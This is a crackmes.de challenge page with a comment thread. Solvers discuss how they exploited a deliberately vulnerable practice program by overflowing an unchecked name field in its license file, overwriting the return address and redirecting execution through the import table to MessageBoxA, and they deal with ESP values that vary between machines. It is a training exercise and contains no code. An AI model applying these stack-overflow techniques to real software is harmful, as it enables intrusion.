abcd's abcd's battleroyale
| Download abcd__s_battle_royale.zip, 22 kb (password: crackmes.de) Browse contents of abcd__s_battle_royale.zip The challenge is to exploit vulnerability in the program and display a dialog box. Details in the readme file. This is a tough one for sure!!!
Difficulty: 4 - Needs special knowledge | Send a message to abcd » View profile of abcd » |
Solutions
Solution by Ox87k, published 04. apr, 2008; download (1793 kb), password: crackmes.de or browse.
Ox87k has rated this crackme as awesome.
Solution by DigitalAcid, published 04. apr, 2008; download (139 kb), password: crackmes.de or browse.
DigitalAcid has rated this crackme as awesome.
Solution by antofik, published 04. apr, 2008; download (26 kb), password: crackmes.de or browse.
antofik has rated this crackme as nothing special.
Discussion and comments
| DigitalAcid 27. Mar 2008 | Hmm, your "solution" doesn't work here, because adresses are different. I think we got to exploit the license file (buffer overflow or code injection or something ?). |
|---|---|
| cosmos 28. Mar 2008 | Hmm i need to work more... |
| DigitalAcid 28. Mar 2008 | I managed to inject a messagebox using the license file, but i still get an error after clicking the OK button. I don't know enough to fix it =). Other than that, it works :P. |
| abcd Author 29. Mar 2008 | @DigitalAcid Please submit your solution....you may be right after all... :) |
| DigitalAcid 29. Mar 2008 | Uploaded my tutorial. If my solution is correct, I really liked this crackme :). |
| Sinok 29. Mar 2008 | And if it isn't? :P |
| DigitalAcid 29. Mar 2008 | Then i'm disappointed :P. |
| TeruS 30. Mar 2008 | Own3d=) I'll try to post only license.lic file as a solution :) Would you mind? |
| ksnrcp 31. Mar 2008 | i think i got it : ) serveral jump above msgbox address can jump to check license ,hehehe |
| Ox87k 31. Mar 2008 | very interesting, solved it! I have a valid license file in order to exploit it as you want but i have a problem. I need esp but it change from pc to pc and so i can't memorize it. The only way i know is to create a loader that runs the crackme, after you press Test it grabs the value of esp and with it create a valid license file. @abcd: Can it be a valid solution? |
| TeruS 31. Mar 2008 | Ox87k, look at the IAT, and use it for yur sploit being work on other PC's. All you need is there(if i've unrerstood you properly). Good luck! :) |
| Ox87k 31. Mar 2008 | TeruS, your keyfile doesn't work on my pc infact it crashes when, after retn, you call MessageBoxA (I don't understand why you can exploit it with a retn over messagebox without any parameters!). You have to inject your code in the memory with the license file and not just call the messagebox (moreover without any parameter) |
| DigitalAcid 31. Mar 2008 | Woah, Ox87k that looks great. Mine is crashing all the time after clicking the OK button. I don't think my solution will be right now =). Allthough I can't download TeruS' file, I also exploited a RET to redirect it to my own code. It should only work on my own pc, due to different adressess stuff. |
| Ox87k 31. Mar 2008 | @DigitalAcid: Exactly! ;) But... Why your license crashing after clicking the Ok button? |
| DigitalAcid 31. Mar 2008 | It's because of the RET. I tried adding a jump to make it go back to some original code, but nothing seems to work. @Ox87k: did you use/modify the about box 8-) ? |
| Ox87k 31. Mar 2008 | @DigitalAcid: Read the readme and see the iat (about your error)...! :P I didn't use the about box and i didn't modify anything in the exe, just make all with the license file :) |
| DigitalAcid 31. Mar 2008 | Oh, I didn't see we had to add "Hacked!" as text :s. What is the connection of the IAT and my error O.o ? |
| Ox87k 31. Mar 2008 | Are you sure to have readed the readme.txt? :D Just think about this part: "...the OK button to exit the program" |
| abcd Author 01. Apr 2008 | Just to make some things clear, the exit messagebox must appear like this:- http://www.mediafire.com/imageview.php?quickkey=mhxxid53b4g&thumb=4 And to all those people who have solved it, please submit your tutorials. @Ox87k,your video preview was looking great. |
| Ox87k 01. Apr 2008 | i submit my solution yesterday night ;) |
| TeruS 01. Apr 2008 | Mmm... What i've done? i saw that name was loaded into stack without checking size. so we overwrite the return address of the function to jmp dword ptr [MessageBoxA] and while alling this in the top of stack there must be an address of ExitProcess and after it goparameters of these functions... |
| DigitalAcid 02. Apr 2008 | @: Ox87k, thx for pointing that out :). It works without error now. Weee, finally got a working version now :P. I had problems with my string that got overwritten. After lots of frustration i now learned why it happened =). Only had to add 3 bytes :O. |
| andrewl.us Moderator 03. Apr 2008 | How are you guys viewing submissions before any solutions are approved? |
| TiGa 04. Apr 2008 | Nice to see new people making videos. |
| DigitalAcid 04. Apr 2008 | I asked my nephew to test the crackme on his pc with my (same) license and he said it worked, so please somebody try my file too :). It might have been coincidence. |
| abcd Author 04. Apr 2008 | @ DigitalAcid your solution did not work on my comp :( .... but i think you got the solution later so you can update it..... |
| TeruS 04. Apr 2008 | if i understand correctly, then there can't be universal solution... |
| TeruS 04. Apr 2008 | from all submitted solutions only one by DigitalAcid worked by me... |
| Ox87k 04. Apr 2008 | @DigitalAcid: Your keyfile doesn't work for me too but i don't think it's a problem. I agree with TeruS, i think it's impossible to find a valid universal keyfile. All depend from ESP's value. Maybe in some machine it works good because they can have the same esp of DigitalAcid's solution required but in many other machine isn't it. You can see this difference in my solution, look the video-solution, i tried to show you this crackme over two different machine with the same os. |
| TeruS 05. Apr 2008 | What about me - on VM my keyfile works almost good :) But instead of a good text in a box i recieve some unrecognizeble characters :) |
| DigitalAcid 06. Apr 2008 | @Terus: I had the same problem but without using VM. What i did was subtract a value from esp, as you can see in my tutorial. My string simply got overwritten. |
| Ox87k 06. Apr 2008 | @DigitalAcid: If you don't wan't that your string is overwritten try to copy esp in another register and then subtract it as i did |
You may leave your comment, thoughts and discuss this crackme with other reversers here.
Acting childish will not be tolerated.
HTML and such will be left as-is, so don't try.